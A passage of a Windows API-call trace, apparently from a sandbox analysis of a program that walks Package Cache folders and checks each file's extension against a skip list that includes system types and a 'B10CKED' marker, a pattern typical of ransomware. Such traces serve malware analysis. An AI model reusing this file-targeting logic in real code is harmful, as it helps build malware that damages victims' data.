CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.170] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.170] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.170] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.170] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.170] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0110.171] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.171] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\") returned 0x59 [0110.171] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0110.172] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.172] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.172] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0110.172] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0110.172] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0110.172] CharUpperBuffW (in: lpsz="msu", cchLength=0x3 | out: lpsz="MSU") returned 0x3 [0110.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="MSU", cchCount2=3) returned 2 [0110.174] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0110.174] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0110.174] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0110.174] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.174] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.174] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.174] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.174] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.174] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: 